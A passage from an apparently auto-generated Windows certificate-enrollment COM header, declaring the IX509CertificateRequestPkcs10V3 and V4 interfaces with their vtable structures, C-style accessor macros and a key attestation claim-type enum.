#define IX509CertificateRequestPkcs10V3_put_KeyContainerNamePrefix(This,Value)	\
    ( (This)->lpVtbl -> put_KeyContainerNamePrefix(This,Value) ) 

#define IX509CertificateRequestPkcs10V3_get_CryptAttributes(This,ppValue)	\
    ( (This)->lpVtbl -> get_CryptAttributes(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V3_get_X509Extensions(This,ppValue)	\
    ( (This)->lpVtbl -> get_X509Extensions(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V3_get_CriticalExtensions(This,ppValue)	\
    ( (This)->lpVtbl -> get_CriticalExtensions(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V3_get_SuppressOids(This,ppValue)	\
    ( (This)->lpVtbl -> get_SuppressOids(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V3_get_RawDataToBeSigned(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawDataToBeSigned(This,Encoding,pValue) ) 

#define IX509CertificateRequestPkcs10V3_get_Signature(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_Signature(This,Encoding,pValue) ) 

#define IX509CertificateRequestPkcs10V3_GetCspStatuses(This,KeySpec,ppCspStatuses)	\
    ( (This)->lpVtbl -> GetCspStatuses(This,KeySpec,ppCspStatuses) ) 


#define IX509CertificateRequestPkcs10V3_InitializeFromTemplate(This,context,pPolicyServer,pTemplate)	\
    ( (This)->lpVtbl -> InitializeFromTemplate(This,context,pPolicyServer,pTemplate) ) 

#define IX509CertificateRequestPkcs10V3_InitializeFromPrivateKeyTemplate(This,Context,pPrivateKey,pPolicyServer,pTemplate)	\
    ( (This)->lpVtbl -> InitializeFromPrivateKeyTemplate(This,Context,pPrivateKey,pPolicyServer,pTemplate) ) 

#define IX509CertificateRequestPkcs10V3_InitializeFromPublicKeyTemplate(This,Context,pPublicKey,pPolicyServer,pTemplate)	\
    ( (This)->lpVtbl -> InitializeFromPublicKeyTemplate(This,Context,pPublicKey,pPolicyServer,pTemplate) ) 

#define IX509CertificateRequestPkcs10V3_get_PolicyServer(This,ppPolicyServer)	\
    ( (This)->lpVtbl -> get_PolicyServer(This,ppPolicyServer) ) 

#define IX509CertificateRequestPkcs10V3_get_Template(This,ppTemplate)	\
    ( (This)->lpVtbl -> get_Template(This,ppTemplate) ) 


#define IX509CertificateRequestPkcs10V3_get_AttestPrivateKey(This,pValue)	\
    ( (This)->lpVtbl -> get_AttestPrivateKey(This,pValue) ) 

#define IX509CertificateRequestPkcs10V3_put_AttestPrivateKey(This,Value)	\
    ( (This)->lpVtbl -> put_AttestPrivateKey(This,Value) ) 

#define IX509CertificateRequestPkcs10V3_get_AttestationEncryptionCertificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_AttestationEncryptionCertificate(This,Encoding,pValue) ) 

#define IX509CertificateRequestPkcs10V3_put_AttestationEncryptionCertificate(This,Encoding,Value)	\
    ( (This)->lpVtbl -> put_AttestationEncryptionCertificate(This,Encoding,Value) ) 

#define IX509CertificateRequestPkcs10V3_get_EncryptionAlgorithm(This,ppValue)	\
    ( (This)->lpVtbl -> get_EncryptionAlgorithm(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V3_put_EncryptionAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> put_EncryptionAlgorithm(This,pValue) ) 

#define IX509CertificateRequestPkcs10V3_get_EncryptionStrength(This,pValue)	\
    ( (This)->lpVtbl -> get_EncryptionStrength(This,pValue) ) 

#define IX509CertificateRequestPkcs10V3_put_EncryptionStrength(This,Value)	\
    ( (This)->lpVtbl -> put_EncryptionStrength(This,Value) ) 

#define IX509CertificateRequestPkcs10V3_get_ChallengePassword(This,pValue)	\
    ( (This)->lpVtbl -> get_ChallengePassword(This,pValue) ) 

#define IX509CertificateRequestPkcs10V3_put_ChallengePassword(This,Value)	\
    ( (This)->lpVtbl -> put_ChallengePassword(This,Value) ) 

#define IX509CertificateRequestPkcs10V3_get_NameValuePairs(This,ppValue)	\
    ( (This)->lpVtbl -> get_NameValuePairs(This,ppValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509CertificateRequestPkcs10V3_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certenroll_0000_0079 */
/* [local] */ 

typedef 
enum KeyAttestationClaimType
    {
        XCN_NCRYPT_CLAIM_NONE	= 0,
        XCN_NCRYPT_CLAIM_AUTHORITY_AND_SUBJECT	= 0x3,
        XCN_NCRYPT_CLAIM_AUTHORITY_ONLY	= 0x1,
        XCN_NCRYPT_CLAIM_SUBJECT_ONLY	= 0x2,
        XCN_NCRYPT_CLAIM_UNKNOWN	= 0x1000
    } 	KeyAttestationClaimType;



extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0079_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0079_v0_0_s_ifspec;

#ifndef __IX509CertificateRequestPkcs10V4_INTERFACE_DEFINED__
#define __IX509CertificateRequestPkcs10V4_INTERFACE_DEFINED__

/* interface IX509CertificateRequestPkcs10V4 */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509CertificateRequestPkcs10V4;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab363-217d-11da-b2a4-000e7bbb2b09")
    IX509CertificateRequestPkcs10V4 : public IX509CertificateRequestPkcs10V3
    {
    public:
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_ClaimType( 
            /* [retval][out] */ __RPC__out KeyAttestationClaimType *pValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_ClaimType( 
            /* [in] */ KeyAttestationClaimType Value) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_AttestPrivateKeyPreferred( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_AttestPrivateKeyPreferred( 
            /* [in] */ VARIANT_BOOL Value) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509CertificateRequestPkcs10V4Vtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509CertificateRequestPkcs10V4 * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [in] */ X509CertificateEnrollmentContext Context);
        
        HRESULT ( STDMETHODCALLTYPE *Encode )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This);
        
        HRESULT ( STDMETHODCALLTYPE *ResetForEncode )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetInnerRequest )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [in] */ InnerRequestLevel Level,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateRequest **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Type )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [retval][out] */ __RPC__out X509RequestType *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EnrollmentContext )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [retval][out] */ __RPC__out X509CertificateEnrollmentContext *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Silent )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Silent )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ParentWindow )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ParentWindow )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [in] */ LONG Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_UIContextMessage )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_UIContextMessage )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SuppressDefaults )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_SuppressDefaults )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RenewalCertificate )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_RenewalCertificate )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ClientId )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [retval][out] */ __RPC__out RequestClientInfoClientId *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_ClientId )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [in] */ RequestClientInfoClientId Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CspInformations )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [retval][out] */ __RPC__deref_out_opt ICspInformations **ppValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_CspInformations )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [in] */ __RPC__in_opt ICspInformations *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_HashAlgorithm )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_HashAlgorithm )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [in] */ __RPC__in_opt IObjectId *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_AlternateSignatureAlgorithm )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_AlternateSignatureAlgorithm )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromTemplateName )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *InitializeFromPrivateKey )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in_opt IX509PrivateKey *pPrivateKey,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromPublicKey )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in_opt IX509PublicKey *pPublicKey,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificate )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in BSTR strCertificate,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [defaultvalue][in] */ X509RequestInheritOptions InheritOptions);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [in] */ __RPC__in BSTR strEncodedData,
            /* [defaultvalue][in] */ EncodingType Encoding);
        
        HRESULT ( STDMETHODCALLTYPE *CheckSignature )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [defaultvalue][in] */ Pkcs10AllowedSignatureTypes AllowedSignatureTypes);
        
        HRESULT ( STDMETHODCALLTYPE *IsSmartCard )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_TemplateObjectId )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PublicKey )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509PublicKey **ppValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_PrivateKey )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509PrivateKey **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_NullSigned )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ReuseKey )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_OldCertificate )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Subject )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX500DistinguishedName **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_Subject )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [in] */ __RPC__in_opt IX500DistinguishedName *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CspStatuses )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatuses **ppValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_SmimeCapabilities )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_SmimeCapabilities )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SignatureInformation )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509SignatureInformation **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_KeyContainerNamePrefix )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_KeyContainerNamePrefix )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CryptAttributes )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [retval][out] */ __RPC__deref_out_opt ICryptAttributes **ppValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_X509Extensions )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509Extensions **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CriticalExtensions )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SuppressOids )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawDataToBeSigned )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Signature )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetCspStatuses )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [in] */ X509KeySpec KeySpec,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatuses **ppCspStatuses);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromTemplate )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [in] */ X509CertificateEnrollmentContext context,
            /* [in] */ __RPC__in_opt IX509EnrollmentPolicyServer *pPolicyServer,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pTemplate);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromPrivateKeyTemplate )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in_opt IX509PrivateKey *pPrivateKey,
            /* [in] */ __RPC__in_opt IX509EnrollmentPolicyServer *pPolicyServer,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pTemplate);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromPublicKeyTemplate )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in_opt IX509PublicKey *pPublicKey,
            /* [in] */ __RPC__in_opt IX509EnrollmentPolicyServer *pPolicyServer,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pTemplate);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PolicyServer )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509EnrollmentPolicyServer **ppPolicyServer);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Template )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateTemplate **ppTemplate);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_AttestPrivateKey )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_AttestPrivateKey )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_AttestationEncryptionCertificate )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_AttestationEncryptionCertificate )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_EncryptionAlgorithm )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_EncryptionAlgorithm )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [in] */ __RPC__in_opt IObjectId *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_EncryptionStrength )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_EncryptionStrength )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [in] */ LONG Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ChallengePassword )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ChallengePassword )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_NameValuePairs )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509NameValuePairs **ppValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ClaimType )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [retval][out] */ __RPC__out KeyAttestationClaimType *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_ClaimType )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [in] */ KeyAttestationClaimType Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_AttestPrivateKeyPreferred )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_AttestPrivateKeyPreferred )( 
            __RPC__in IX509CertificateRequestPkcs10V4 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        END_INTERFACE
    } IX509CertificateRequestPkcs10V4Vtbl;

    interface IX509CertificateRequestPkcs10V4
    {
        CONST_VTBL struct IX509CertificateRequestPkcs10V4Vtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509CertificateRequestPkcs10V4_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509CertificateRequestPkcs10V4_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509CertificateRequestPkcs10V4_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509CertificateRequestPkcs10V4_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509CertificateRequestPkcs10V4_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509CertificateRequestPkcs10V4_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509CertificateRequestPkcs10V4_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509CertificateRequestPkcs10V4_Initialize(This,Context)	\
    ( (This)->lpVtbl -> Initialize(This,Context) ) 

#define IX509CertificateRequestPkcs10V4_Encode(This)	\
    ( (This)->lpVtbl -> Encode(This) ) 

#define IX509CertificateRequestPkcs10V4_ResetForEncode(This)	\
    ( (This)->lpVtbl -> ResetForEncode(This) ) 

#define IX509CertificateRequestPkcs10V4_GetInnerRequest(This,Level,ppValue)	\
    ( (This)->lpVtbl -> GetInnerRequest(This,Level,ppValue) ) 

#define IX509CertificateRequestPkcs10V4_get_Type(This,pValue)	\
    ( (This)->lpVtbl -> get_Type(This,pValue) ) 

#define IX509CertificateRequestPkcs10V4_get_EnrollmentContext(This,pValue)	\
    ( (This)->lpVtbl -> get_EnrollmentContext(This,pValue) ) 

#define IX509CertificateRequestPkcs10V4_get_Silent(This,pValue)	\
    ( (This)->lpVtbl -> get_Silent(This,pValue) ) 

#define IX509CertificateRequestPkcs10V4_put_Silent(This,Value)	\
    ( (This)->lpVtbl -> put_Silent(This,Value) ) 

#define IX509CertificateRequestPkcs10V4_get_ParentWindow(This,pValue)	\
    ( (This)->lpVtbl -> get_ParentWindow(This,pValue) ) 

#define IX509CertificateRequestPkcs10V4_put_ParentWindow(This,Value)	\
    ( (This)->lpVtbl -> put_ParentWindow(This,Value) ) 

#define IX509CertificateRequestPkcs10V4_get_UIContextMessage(This,pValue)	\
    ( (This)->lpVtbl -> get_UIContextMessage(This,pValue) ) 

#define IX509CertificateRequestPkcs10V4_put_UIContextMessage(This,Value)	\
    ( (This)->lpVtbl -> put_UIContextMessage(This,Value) ) 

#define IX509CertificateRequestPkcs10V4_get_SuppressDefaults(This,pValue)	\
    ( (This)->lpVtbl -> get_SuppressDefaults(This,pValue) ) 

#define IX509CertificateRequestPkcs10V4_put_SuppressDefaults(This,Value)	\
    ( (This)->lpVtbl -> put_SuppressDefaults(This,Value) ) 

#define IX509CertificateRequestPkcs10V4_get_RenewalCertificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RenewalCertificate(This,Encoding,pValue) ) 

#define IX509CertificateRequestPkcs10V4_put_RenewalCertificate(This,Encoding,Value)	\
    ( (This)->lpVtbl -> put_RenewalCertificate(This,Encoding,Value) ) 

#define IX509CertificateRequestPkcs10V4_get_ClientId(This,pValue)	\
    ( (This)->lpVtbl -> get_ClientId(This,pValue) ) 

#define IX509CertificateRequestPkcs10V4_put_ClientId(This,Value)	\
    ( (This)->lpVtbl -> put_ClientId(This,Value) ) 

#define IX509CertificateRequestPkcs10V4_get_CspInformations(This,ppValue)	\
    ( (This)->lpVtbl -> get_CspInformations(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V4_put_CspInformations(This,pValue)	\
    ( (This)->lpVtbl -> put_CspInformations(This,pValue) ) 

#define IX509CertificateRequestPkcs10V4_get_HashAlgorithm(This,ppValue)	\
    ( (This)->lpVtbl -> get_HashAlgorithm(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V4_put_HashAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> put_HashAlgorithm(This,pValue) ) 

#define IX509CertificateRequestPkcs10V4_get_AlternateSignatureAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> get_AlternateSignatureAlgorithm(This,pValue) ) 

#define IX509CertificateRequestPkcs10V4_put_AlternateSignatureAlgorithm(This,Value)	\
    ( (This)->lpVtbl -> put_AlternateSignatureAlgorithm(This,Value) ) 

